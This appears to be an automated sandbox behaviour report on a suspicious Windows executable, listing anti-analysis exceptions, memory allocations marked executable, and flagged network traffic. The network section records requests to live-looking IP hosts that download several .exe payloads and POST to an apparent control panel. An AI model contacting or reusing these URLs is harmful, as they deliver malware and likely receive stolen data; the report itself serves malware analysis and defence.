exception.instruction_r: fb 50 68 c5 6e 75 5e 89 1c 24 52 ba cb fb f5 7f
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20ce9b
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2150043
exception.address: 0xacce9b
registers.esp: 2685912
registers.edi: 0
registers.eax: 28178
registers.ebp: 3999641620
registers.edx: 6
registers.ebx: 11325239
registers.esi: 2179369302
registers.ecx: 6
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 ba 2d 44 a7 7f e9 29 ff ff ff 58 89 4c 24
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20d51c
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2151708
exception.address: 0xacd51c
registers.esp: 2685908
registers.edi: 0
registers.eax: 30167
registers.ebp: 3999641620
registers.edx: 1757210391
registers.ebx: 1092411361
registers.esi: 11325730
registers.ecx: 618335616
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 81 ec 04 00 00 00 89 14 24 50 51 b9 00 c0
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20d219
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2150937
exception.address: 0xacd219
registers.esp: 2685912
registers.edi: 0
registers.eax: 30167
registers.ebp: 3999641620
registers.edx: 1757210391
registers.ebx: 1092411361
registers.esi: 11355897
registers.ecx: 618335616
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 89 14 24 89 34 24 68 9b 6a df 5f e9 94 fe
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x20d4d7
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2151639
exception.address: 0xacd4d7
registers.esp: 2685912
registers.edi: 0
registers.eax: 4294940412
registers.ebp: 3999641620
registers.edx: 1757210391
registers.ebx: 1092411361
registers.esi: 11355897
registers.ecx: 773209448
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 51 e9 cc fe ff ff 29 d5 5a 87 2c 24 5c 89
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x215d0c
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2186508
exception.address: 0xad5d0c
registers.esp: 2685900
registers.edi: 0
registers.eax: 30675
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 11359901
registers.esi: 11355897
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 2c 24 50 81 ec 04 00 00
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x215a64
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2185828
exception.address: 0xad5a64
registers.esp: 2685904
registers.edi: 1783979243
registers.eax: 30675
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 11362700
registers.esi: 0
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 06 01 00 00 05 3e c6 ed 7d e9 16 01 00 00
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x231eda
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2301658
exception.address: 0xaf1eda
registers.esp: 2685872
registers.edi: 11508821
registers.eax: 32505
registers.ebp: 3999641620
registers.edx: 4294937856
registers.ebx: 116969
registers.esi: 11471859
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 89 e3 57 bf 04 00 00 00 01 fb e9 3a 03 00
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23364e
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2307662
exception.address: 0xaf364e
registers.esp: 2685868
registers.edi: 11508821
registers.eax: 11481109
registers.ebp: 3999641620
registers.edx: 314538387
registers.ebx: 116969
registers.esi: 11471859
registers.ecx: 351671198
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 89 2c 24 e9 07 f8 ff ff 81 c7 13 03
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x233856
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2308182
exception.address: 0xaf3856
registers.esp: 2685872
registers.edi: 11508821
registers.eax: 11507378
registers.ebp: 3999641620
registers.edx: 314538387
registers.ebx: 116969
registers.esi: 11471859
registers.ecx: 351671198
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 c7 04 24 08 b5 c1 2b e9 c5 02 00 00 5c 89
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2335a5
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2307493
exception.address: 0xaf35a5
registers.esp: 2685872
registers.edi: 11508821
registers.eax: 11483946
registers.ebp: 3999641620
registers.edx: 604292945
registers.ebx: 116969
registers.esi: 0
registers.ecx: 351671198
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 bd 85 60 fc 7f e9 00 00 00 00 f7 d5 e9 e0
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x234021
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2310177
exception.address: 0xaf4021
registers.esp: 2685868
registers.edi: 11508821
registers.eax: 31281
registers.ebp: 3999641620
registers.edx: 11484333
registers.ebx: 1674979726
registers.esi: 0
registers.ecx: 351671198
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 e9 f9 fd ff ff be 7c a9 ab 6b 81 e6 54 d0
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x234674
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2311796
exception.address: 0xaf4674
registers.esp: 2685872
registers.edi: 11508821
registers.eax: 4294938620
registers.ebp: 3999641620
registers.edx: 11515614
registers.ebx: 2576714592
registers.esi: 0
registers.ecx: 351671198
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 c7 04 24 ff ad d5
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2356dc
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2315996
exception.address: 0xaf56dc
registers.esp: 2685872
registers.edi: 11489332
registers.eax: 25930
registers.ebp: 3999641620
registers.edx: 11475356
registers.ebx: 2576714592
registers.esi: 11488628
registers.ecx: 11515776
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 c7 04 24 9c 1a b5 2a 89 0c 24 89 e1 e9 09
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x235b30
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2317104
exception.address: 0xaf5b30
registers.esp: 2685872
registers.edi: 0
registers.eax: 25930
registers.ebp: 3999641620
registers.edx: 763207053
registers.ebx: 2576714592
registers.esi: 11488628
registers.ecx: 11492404
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 1d f6 ff ff 5d 53 53 e9 26 fc ff ff 5e 29
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23697c
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2320764
exception.address: 0xaf697c
registers.esp: 2685872
registers.edi: 0
registers.eax: 26965
registers.ebp: 3999641620
registers.edx: 0
registers.ebx: 11495883
registers.esi: 11488628
registers.ecx: 604277075
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 83 00 00 00 81 e7 f5 04 ff 7b 81 c7 cf 91
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23d705
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2348805
exception.address: 0xafd705
registers.esp: 2685872
registers.edi: 3999641620
registers.eax: 11548251
registers.ebp: 3999641620
registers.edx: 0
registers.ebx: 4008704126
registers.esi: 4017735134
registers.ecx: 11520126
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 e9 20 fa ff ff 83 ec 04 e9 82 f7 ff ff 09
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x23d787
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2348935
exception.address: 0xafd787
registers.esp: 2685872
registers.edi: 3999641620
registers.eax: 11524763
registers.ebp: 3999641620
registers.edx: 0
registers.ebx: 4008704126
registers.esi: 24811
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 53 e9 b8 03 00 00 57 89 e7 81 c7 04 00 00 00
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x241094
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2363540
exception.address: 0xb01094
registers.esp: 2685868
registers.edi: 3999641620
registers.eax: 11538149
registers.ebp: 3999641620
registers.edx: 1977259021
registers.ebx: 4009080734
registers.esi: 4007008377
registers.ecx: 1988795303
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb b9 6a 99 8e 7b e9 4d f4 ff ff 81 f3 52 cf ad
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x241bab
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2366379
exception.address: 0xb01bab
registers.esp: 2685872
registers.edi: 4294941040
registers.eax: 11567694
registers.ebp: 3999641620
registers.edx: 1977259021
registers.ebx: 4009080734
registers.esi: 4007008377
registers.ecx: 157417
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 cf c3 3d 51 89 3c 24 e9 5f 04 00 00 89 0c
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2428ae
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2369710
exception.address: 0xb028ae
registers.esp: 2685872
registers.edi: 0
registers.eax: 30995
registers.ebp: 3999641620
registers.edx: 4211642308
registers.ebx: 123754902
registers.esi: 81129
registers.ecx: 11546922
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 e4 fe ff ff 81 f7 e7 2f 45 fb 81 e9 5f 02
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x248b22
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2394914
exception.address: 0xb08b22
registers.esp: 2685868
registers.edi: 0
registers.eax: 31585
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 2147483650
registers.esi: 11550625
registers.ecx: 11569659
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 3c 24 bf 00 00 00 00 68
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x249570
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2397552
exception.address: 0xb09570
registers.esp: 2685872
registers.edi: 0
registers.eax: 31585
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 2147483650
registers.esi: 11550625
registers.ecx: 11601244
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 ce f6 ff ff 59 50 b8 08 22 46 2c 31 c1 58
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x2494f9
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2397433
exception.address: 0xb094f9
registers.esp: 2685872
registers.edi: 0
registers.eax: 4294938880
registers.ebp: 3999641620
registers.edx: 3967899216
registers.ebx: 2147483650
registers.esi: 11550625
registers.ecx: 11601244
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 89 3c 24 e9 6e 01 00 00 68 00 d7 7c 34 89
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x25a143
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2466115
exception.address: 0xb1a143
registers.esp: 2685872
registers.edi: 11669815
registers.eax: 30760
registers.ebp: 3999641620
registers.edx: 59728
registers.ebx: 11591993
registers.esi: 4294939288
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 50 e9 68 fb ff ff be 21 81 6b 72 81 e6 04
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26556f
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2512239
exception.address: 0xb2556f
registers.esp: 2685868
registers.edi: 11673577
registers.eax: 25823
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 11684932
registers.esi: 4294939288
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 e9 1a fb ff ff 68 df e8 b7 75 89 3c 24 e9
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x265221
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2511393
exception.address: 0xb25221
registers.esp: 2685872
registers.edi: 11673577
registers.eax: 25823
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 11710755
registers.esi: 4294939288
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 7a fd ff ff 81 e9 d1 b0 f1 5d 29 d1 e9 00
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26578d
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2512781
exception.address: 0xb2578d
registers.esp: 2685872
registers.edi: 4294944628
registers.eax: 25823
registers.ebp: 3999641620
registers.edx: 604292951
registers.ebx: 11710755
registers.esi: 4294939288
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 56 be 37 08 4e 5e ba 76 66 39 11 31 f2 5e
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26f897
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2554007
exception.address: 0xb2f897
registers.esp: 2685868
registers.edi: 7803
registers.eax: 26948
registers.ebp: 3999641620
registers.edx: 11
registers.ebx: 11727282
registers.esi: 4148652928
registers.ecx: 12
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 df fb ff ff c1 e1 02 81 c1 da c1 df 7b 81
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x26f952
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2554194
exception.address: 0xb2f952
registers.esp: 2685872
registers.edi: 0
registers.eax: 26948
registers.ebp: 3999641620
registers.edx: 11
registers.ebx: 11730610
registers.esi: 4148652928
registers.ecx: 322689
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 b8 b1 dd fb 77 83 c0 ff f7 d0 40 e9 9e 01
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x27362e
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2569774
exception.address: 0xb3362e
registers.esp: 2685868
registers.edi: 0
registers.eax: 31460
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 11730610
registers.esi: 11743029
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 56 e9 40 02 00 00
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x273601
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2569729
exception.address: 0xb33601
registers.esp: 2685872
registers.edi: 590479976
registers.eax: 31460
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 0
registers.esi: 11745941
registers.ecx: 2459238400
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 e9 9c 00 00 00 68 6c 44 e9 62 5f 81 e7 d5
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x283bd1
exception.instruction: sti
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2636753
exception.address: 0xb43bd1
registers.esp: 2685872
registers.edi: 7803
registers.eax: 11838610
registers.ebp: 3999641620
registers.edx: 2130566132
registers.ebx: 4294940828
registers.esi: 1995571212
registers.ecx: 604292946
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.16/mine/random.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.43/Zu7JuNko/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/fate/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/7967666176/13Z5sqy.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/7644806746/jonbDes.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/5666444957/tYrnx75.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/1975996902/up7d8Ym.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/7527271436/012Bdpb.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/5643377291/7fOMOTQ.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.75/files/6691015685/Bjkm5hE.exe
request GET http://185.215.113.16/mine/random.exe
request POST http://185.215.113.43/Zu7JuNko/index.php
request GET http://185.215.113.75/files/fate/random.exe
request GET http://185.215.113.75/files/7967666176/13Z5sqy.exe
request GET http://185.215.113.75/files/7644806746/jonbDes.exe
request GET http://185.215.113.75/files/5666444957/tYrnx75.exe
request GET http://185.215.113.75/files/1975996902/up7d8Ym.exe
request GET http://185.215.113.75/files/7527271436/012Bdpb.exe
request GET http://185.215.113.75/files/5643377291/7fOMOTQ.exe
request GET http://185.215.113.75/files/6691015685/Bjkm5hE.exe
request POST http://185.215.113.43/Zu7JuNko/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734c2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73872000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2668
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x031b0000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02633000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02634000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02635000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02636000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
